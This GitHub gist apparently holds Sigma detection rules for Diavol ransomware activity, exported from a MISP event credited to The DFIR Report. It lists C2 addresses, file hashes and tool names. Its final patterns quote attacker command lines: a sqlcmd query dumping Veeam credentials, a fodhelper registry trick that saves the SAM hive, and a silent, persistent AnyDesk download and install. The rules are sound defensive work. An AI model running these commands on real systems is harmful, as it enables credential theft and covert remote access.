Skip to content

Instantly share code, notes, and snippets.

@0xThiebaut
Last active Dec 12, 2021
Embed
What would you like to do?
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
- Bazar
- tlp:amber
- workflow:state="ongoing"
- misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
- misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
- misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
- misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
- misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
- misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
- misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
- misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
- misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
- misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
- misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
- misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
- misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
- misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
- misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
- misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
- misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
- misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
- misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
- misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
- misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
logsource:
category: firewall
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499481mapping*
- all of event8099attr499483mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
category: proxy
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499479mapping*
- all of event8099attr499480mapping*
- all of event8099attr499481mapping*
- all of event8099attr499482mapping*
- all of event8099attr499483mapping*
- all of event8099attr499485mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499479mappingDomain:
- c-uri|contains: gawocag.com
- cs-referrer|contains: gawocag.com
- r-dns|contains: gawocag.com
event8099attr499480mappingDomain:
- c-uri|contains: hiduwu.com
- cs-referrer|contains: hiduwu.com
- r-dns|contains: hiduwu.com
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499482mappingDomain:
- c-uri|contains: turkcell.info
- cs-referrer|contains: turkcell.info
- r-dns|contains: turkcell.info
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr499485mappingURI:
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
category: webserver
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499479mapping*
- all of event8099attr499480mapping*
- all of event8099attr499481mapping*
- all of event8099attr499482mapping*
- all of event8099attr499483mapping*
- all of event8099attr499485mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499479mappingDomain:
- c-uri|contains: gawocag.com
- cs-referrer|contains: gawocag.com
- r-dns|contains: gawocag.com
event8099attr499480mappingDomain:
- c-uri|contains: hiduwu.com
- cs-referrer|contains: hiduwu.com
- r-dns|contains: hiduwu.com
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499482mappingDomain:
- c-uri|contains: turkcell.info
- cs-referrer|contains: turkcell.info
- r-dns|contains: turkcell.info
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr499485mappingURI:
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
product: windows
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499481mapping*
- all of event8099attr499483mapping*
- all of event8099attr501608mapping*
- event8099
- all of event8099attr545630mapping*
- all of event8099attr545643mapping*
- all of event8099attr545644mapping*
- event8099object26050
- event8099object26051
- event8099object26052
- event8099object26053
- all of event8099object26054attr501549mapping* and event8099object26054
- all of event8099object26055attr501555mapping* and event8099object26055
- event8099object26056
- all of event8099object26057attr501567mapping* and event8099object26057
- all of event8099object26058attr501573mapping* and event8099object26058
- all of event8099object26059attr501579mapping* and event8099object26059
- all of event8099object26062attr501597mapping* and event8099object26062
- event8099object26063
- all of event8099object27480attr545636mapping*
- all of event8099object27486attr545651mapping* and all of event8099object27486attr545652mapping*
event8099:
DestinationIp: 23.152.0.22
event8099attr499477mappingIPDstPort:
DestinationIp: 108.62.141.87
DestinationPort: "443"
event8099attr499478mappingIPDstPort:
DestinationIp: 23.81.246.32
DestinationPort: "443"
event8099attr499481mappingIPDstPort:
DestinationIp: 206.189.49.239
DestinationPort: "443"
event8099attr499483mappingIPDstPort:
DestinationIp: 159.223.31.75
DestinationPort: "443"
event8099attr501608mappingIPDstPort:
DestinationIp: 192.52.167.210
DestinationPort: "22"
event8099attr545630mappingFilename:
- Image|endswith: sqlcmd.exe
- ParentImage|endswith: sqlcmd.exe
- CommandLine|contains: sqlcmd.exe
- ParentCommandLine|contains: sqlcmd.exe
- ProcessName: sqlcmd.exe
- ParentProcessName: sqlcmd.exe
event8099attr545643mappingFilename:
- Image|endswith: tfpkuengdlu.dll
- ParentImage|endswith: tfpkuengdlu.dll
- CommandLine|contains: tfpkuengdlu.dll
- ParentCommandLine|contains: tfpkuengdlu.dll
- ProcessName: tfpkuengdlu.dll
- ParentProcessName: tfpkuengdlu.dll
event8099attr545644mappingFilename:
- Image|endswith: uvvfvnnswte.dll
- ParentImage|endswith: uvvfvnnswte.dll
- CommandLine|contains: uvvfvnnswte.dll
- ParentCommandLine|contains: uvvfvnnswte.dll
- ProcessName: uvvfvnnswte.dll
- ParentProcessName: uvvfvnnswte.dll
event8099object26050:
Hashes|contains:
- ae0ecfddce57c8f966c5ce2e448a39ba
- 93de6401b68303f5acf7745187dbe6e8ade26a01
- 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
event8099object26051:
Hashes|contains:
- 4d8af5ba95aa23f7162b7bbf8622d801
- d5b8c1a219686be5b75e58c560609023b491d9aa
- e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
event8099object26052:
Hashes|contains:
- fb88f4d22f14ca09ddeeca5d312f4d9f
- 734205a694689db504418101b91c9981e3a12deb
- c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
event8099object26053:
Hashes|contains:
- 9b02dd2a1a15e94922be3f85129083ac
- 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
- b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
event8099object26054:
Hashes|contains:
- 6798ff540f3d077c3cda2f5a4a8559f7
- 40e8b04603f168b034c322be6c8b0afa5a9e89ac
- 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
event8099object26054attr501549mappingFilename:
- Image|endswith: Rubeus.exe
- ParentImage|endswith: Rubeus.exe
- CommandLine|contains: Rubeus.exe
- ParentCommandLine|contains: Rubeus.exe
- ProcessName: Rubeus.exe
- ParentProcessName: Rubeus.exe
event8099object26055:
Hashes|contains:
- 69c68c62844966115c13dfee2e7bc58c
- 7f49ecaebe1c59c09587cee25fb8844c78a78665
- 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
event8099object26055attr501555mappingFilename:
- Image|endswith: uvvfvnnswte.dll
- ParentImage|endswith: uvvfvnnswte.dll
- CommandLine|contains: uvvfvnnswte.dll
- ParentCommandLine|contains: uvvfvnnswte.dll
- ProcessName: uvvfvnnswte.dll
- ParentProcessName: uvvfvnnswte.dll
event8099object26056:
Hashes|contains:
- 56c552097559ecbafedd5683038ca480
- dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
- 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
event8099object26057:
Hashes|contains:
- 1e81900cc66fde050aef4c3149f1a375
- f334b1b95f315f994c82da572e7acb68df4b17ed
- 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
event8099object26057attr501567mappingFilename:
- Image|endswith: fodhelper_reg_hashes.bat
- ParentImage|endswith: fodhelper_reg_hashes.bat
- CommandLine|contains: fodhelper_reg_hashes.bat
- ParentCommandLine|contains: fodhelper_reg_hashes.bat
- ProcessName: fodhelper_reg_hashes.bat
- ParentProcessName: fodhelper_reg_hashes.bat
event8099object26058:
Hashes|contains:
- e63eff806ef5a7d04dabad6e59e88e3a
- 4d7102f088c73eb91213f6950f0d334157557fce
- 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
event8099object26058attr501573mappingFilename:
- Image|endswith: README_FOR_DECRYPT.txt
- ParentImage|endswith: README_FOR_DECRYPT.txt
- CommandLine|contains: README_FOR_DECRYPT.txt
- ParentCommandLine|contains: README_FOR_DECRYPT.txt
- ProcessName: README_FOR_DECRYPT.txt
- ParentProcessName: README_FOR_DECRYPT.txt
event8099object26059:
Hashes|contains:
- e6bef068c93cacdae7f15eded63461da
- 0390eacb29a580adf9870dbd3412f91d984a3197
- bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
event8099object26059attr501579mappingFilename:
- Image|endswith: MSSQLUDPScanner.exe
- ParentImage|endswith: MSSQLUDPScanner.exe
- CommandLine|contains: MSSQLUDPScanner.exe
- ParentCommandLine|contains: MSSQLUDPScanner.exe
- ProcessName: MSSQLUDPScanner.exe
- ParentProcessName: MSSQLUDPScanner.exe
event8099object26062:
Hashes|contains:
- 32d6f85c93bad9fa0f3eda1a8e800160
- 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
- 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
event8099object26062attr501597mappingFilename:
- Image|endswith: veeam1.cs.exe
- ParentImage|endswith: veeam1.cs.exe
- CommandLine|contains: veeam1.cs.exe
- ParentCommandLine|contains: veeam1.cs.exe
- ProcessName: veeam1.cs.exe
- ParentProcessName: veeam1.cs.exe
event8099object26063:
Hashes|contains:
- e5f3cea83f3aa86fc4766c8061a8f3ec
- 77b238f5755940fbdc85a8f88a841e73cbe240e5
- a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
event8099object27480attr545636mappingFilename:
- Image|endswith: fodhelper_reg_hashes.bat
- ParentImage|endswith: fodhelper_reg_hashes.bat
- CommandLine|contains: fodhelper_reg_hashes.bat
- ParentCommandLine|contains: fodhelper_reg_hashes.bat
- ProcessName: fodhelper_reg_hashes.bat
- ParentProcessName: fodhelper_reg_hashes.bat
event8099object27486attr545651mappingFilename:
- Image|endswith: cmd.exe
- ParentImage|endswith: cmd.exe
- CommandLine|contains: cmd.exe
- ParentCommandLine|contains: cmd.exe
- ProcessName: cmd.exe
- ParentProcessName: cmd.exe
event8099object27486attr545652mappingFilename:
- Image|endswith: more.exe
- ParentImage|endswith: more.exe
- CommandLine|contains: more.exe
- ParentCommandLine|contains: more.exe
- ProcessName: more.exe
- ParentProcessName: more.exe
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
- Bazar
- tlp:amber
- workflow:state="ongoing"
- misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
- misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
- misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
- misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
- misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
- misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
- misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
- misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
- misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
- misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
- misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
- misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
- misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
- misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
- misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
- misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
- misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
- misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
- misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
- misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
- misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
logsource:
category: firewall
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499481mapping*
- all of event8099attr499483mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
category: proxy
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499479mapping*
- all of event8099attr499480mapping*
- all of event8099attr499481mapping*
- all of event8099attr499482mapping*
- all of event8099attr499483mapping*
- all of event8099attr499485mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499479mappingDomain:
- c-uri|contains: gawocag.com
- cs-referrer|contains: gawocag.com
- r-dns|contains: gawocag.com
event8099attr499480mappingDomain:
- c-uri|contains: hiduwu.com
- cs-referrer|contains: hiduwu.com
- r-dns|contains: hiduwu.com
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499482mappingDomain:
- c-uri|contains: turkcell.info
- cs-referrer|contains: turkcell.info
- r-dns|contains: turkcell.info
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr499485mappingURI:
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
category: webserver
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499479mapping*
- all of event8099attr499480mapping*
- all of event8099attr499481mapping*
- all of event8099attr499482mapping*
- all of event8099attr499483mapping*
- all of event8099attr499485mapping*
- all of event8099attr501608mapping*
- event8099
event8099:
dst_ip: 23.152.0.22
event8099attr499477mappingIPDstPort:
dst_ip: 108.62.141.87
dst_port: "443"
event8099attr499478mappingIPDstPort:
dst_ip: 23.81.246.32
dst_port: "443"
event8099attr499479mappingDomain:
- c-uri|contains: gawocag.com
- cs-referrer|contains: gawocag.com
- r-dns|contains: gawocag.com
event8099attr499480mappingDomain:
- c-uri|contains: hiduwu.com
- cs-referrer|contains: hiduwu.com
- r-dns|contains: hiduwu.com
event8099attr499481mappingIPDstPort:
dst_ip: 206.189.49.239
dst_port: "443"
event8099attr499482mappingDomain:
- c-uri|contains: turkcell.info
- cs-referrer|contains: turkcell.info
- r-dns|contains: turkcell.info
event8099attr499483mappingIPDstPort:
dst_ip: 159.223.31.75
dst_port: "443"
event8099attr499485mappingURI:
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
event8099attr501608mappingIPDstPort:
dst_ip: 192.52.167.210
dst_port: "22"
---
logsource:
product: windows
detection:
condition:
- all of event8099attr499477mapping*
- all of event8099attr499478mapping*
- all of event8099attr499481mapping*
- all of event8099attr499483mapping*
- all of event8099attr501608mapping*
- event8099
- all of event8099attr545630mapping*
- all of event8099attr545643mapping*
- all of event8099attr545644mapping*
- event8099object26050
- event8099object26051
- event8099object26052
- event8099object26053
- all of event8099object26054attr501549mapping* and event8099object26054
- all of event8099object26055attr501555mapping* and event8099object26055
- event8099object26056
- all of event8099object26057attr501567mapping* and event8099object26057
- all of event8099object26058attr501573mapping* and event8099object26058
- all of event8099object26059attr501579mapping* and event8099object26059
- all of event8099object26062attr501597mapping* and event8099object26062
- event8099object26063
- event8099object27478
- event8099object27479
- all of event8099object27480attr545636mapping*
- event8099object27481
- event8099object27482
- event8099object27483
- event8099object27484
- event8099object27485
- event8099object27486
event8099:
DestinationIp: 23.152.0.22
event8099attr499477mappingIPDstPort:
DestinationIp: 108.62.141.87
DestinationPort: "443"
event8099attr499478mappingIPDstPort:
DestinationIp: 23.81.246.32
DestinationPort: "443"
event8099attr499481mappingIPDstPort:
DestinationIp: 206.189.49.239
DestinationPort: "443"
event8099attr499483mappingIPDstPort:
DestinationIp: 159.223.31.75
DestinationPort: "443"
event8099attr501608mappingIPDstPort:
DestinationIp: 192.52.167.210
DestinationPort: "22"
event8099attr545630mappingFilename:
- Image|endswith: sqlcmd.exe
- ParentImage|endswith: sqlcmd.exe
- CommandLine|contains: sqlcmd.exe
- ParentCommandLine|contains: sqlcmd.exe
- ProcessName: sqlcmd.exe
- ParentProcessName: sqlcmd.exe
event8099attr545643mappingFilename:
- Image|endswith: tfpkuengdlu.dll
- ParentImage|endswith: tfpkuengdlu.dll
- CommandLine|contains: tfpkuengdlu.dll
- ParentCommandLine|contains: tfpkuengdlu.dll
- ProcessName: tfpkuengdlu.dll
- ParentProcessName: tfpkuengdlu.dll
event8099attr545644mappingFilename:
- Image|endswith: uvvfvnnswte.dll
- ParentImage|endswith: uvvfvnnswte.dll
- CommandLine|contains: uvvfvnnswte.dll
- ParentCommandLine|contains: uvvfvnnswte.dll
- ProcessName: uvvfvnnswte.dll
- ParentProcessName: uvvfvnnswte.dll
event8099object26050:
Hashes|contains:
- ae0ecfddce57c8f966c5ce2e448a39ba
- 93de6401b68303f5acf7745187dbe6e8ade26a01
- 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
event8099object26051:
Hashes|contains:
- 4d8af5ba95aa23f7162b7bbf8622d801
- d5b8c1a219686be5b75e58c560609023b491d9aa
- e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
event8099object26052:
Hashes|contains:
- fb88f4d22f14ca09ddeeca5d312f4d9f
- 734205a694689db504418101b91c9981e3a12deb
- c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
event8099object26053:
Hashes|contains:
- 9b02dd2a1a15e94922be3f85129083ac
- 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
- b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
event8099object26054:
Hashes|contains:
- 6798ff540f3d077c3cda2f5a4a8559f7
- 40e8b04603f168b034c322be6c8b0afa5a9e89ac
- 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
event8099object26054attr501549mappingFilename:
- Image|endswith: Rubeus.exe
- ProcessName|contains: Rubeus.exe
event8099object26055:
Hashes|contains:
- 69c68c62844966115c13dfee2e7bc58c
- 7f49ecaebe1c59c09587cee25fb8844c78a78665
- 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
event8099object26055attr501555mappingFilename:
- Image|endswith: uvvfvnnswte.dll
- ProcessName|contains: uvvfvnnswte.dll
event8099object26056:
Hashes|contains:
- 56c552097559ecbafedd5683038ca480
- dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
- 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
event8099object26057:
Hashes|contains:
- 1e81900cc66fde050aef4c3149f1a375
- f334b1b95f315f994c82da572e7acb68df4b17ed
- 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
event8099object26057attr501567mappingFilename:
- Image|endswith: fodhelper_reg_hashes.bat
- ProcessName|contains: fodhelper_reg_hashes.bat
event8099object26058:
Hashes|contains:
- e63eff806ef5a7d04dabad6e59e88e3a
- 4d7102f088c73eb91213f6950f0d334157557fce
- 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
event8099object26058attr501573mappingFilename:
- Image|endswith: README_FOR_DECRYPT.txt
- ProcessName|contains: README_FOR_DECRYPT.txt
event8099object26059:
Hashes|contains:
- e6bef068c93cacdae7f15eded63461da
- 0390eacb29a580adf9870dbd3412f91d984a3197
- bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
event8099object26059attr501579mappingFilename:
- Image|endswith: MSSQLUDPScanner.exe
- ProcessName|contains: MSSQLUDPScanner.exe
event8099object26062:
Hashes|contains:
- 32d6f85c93bad9fa0f3eda1a8e800160
- 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
- 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
event8099object26062attr501597mappingFilename:
- Image|endswith: veeam1.cs.exe
- ProcessName|contains: veeam1.cs.exe
event8099object26063:
Hashes|contains:
- e5f3cea83f3aa86fc4766c8061a8f3ec
- 77b238f5755940fbdc85a8f88a841e73cbe240e5
- a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
event8099object27478:
CommandLine|contains: sqlcmd.exe -S localhost,51341 -E -y0 -Q "SELECT TOP (1000)
[id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM
[VeeamBackup].[dbo].[Credentials];"
event8099object27479:
CommandLine|contains: csc.exe veeam1.cs.txt
event8099object27480attr545636mappingFilename:
- Image|endswith: fodhelper_reg_hashes.bat
- ProcessName|contains: fodhelper_reg_hashes.bat
event8099object27481:
CommandLine|contains: reg.exe add hkcu\software\classes\ms-settings\shell\open\command
/ve /d "reg.exe save hklm\sam %ALLUSERSPROFILE%\sam.save" /f
event8099object27482:
CommandLine|contains: (new-object System.Net.WebClient).DownloadFile("http://download.anydesk.com/AnyDesk.exe",
"%ALLUSERSPROFILE%\AnyDesk.exe")
event8099object27483:
CommandLine|contains: cmd.exe /c %ALLUSERSPROFILE%\AnyDesk.exe --install %ALLUSERSPROFILE%\AnyDesk
--start-with-win --silent
event8099object27484:
ParentProcessName: msedge.exe
ProcessName: rundll32.exe
event8099object27485:
CommandLine|contains: sqlcmd -E -S localhost -Q "BACKUP DATABASE master TO DISK='%ALLUSERSPROFILE%\sql\master.bak'"
event8099object27486:
CommandLine|contains: edge-cookies.json
Image|endswith: more.exe
ParentImage|endswith: cmd.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment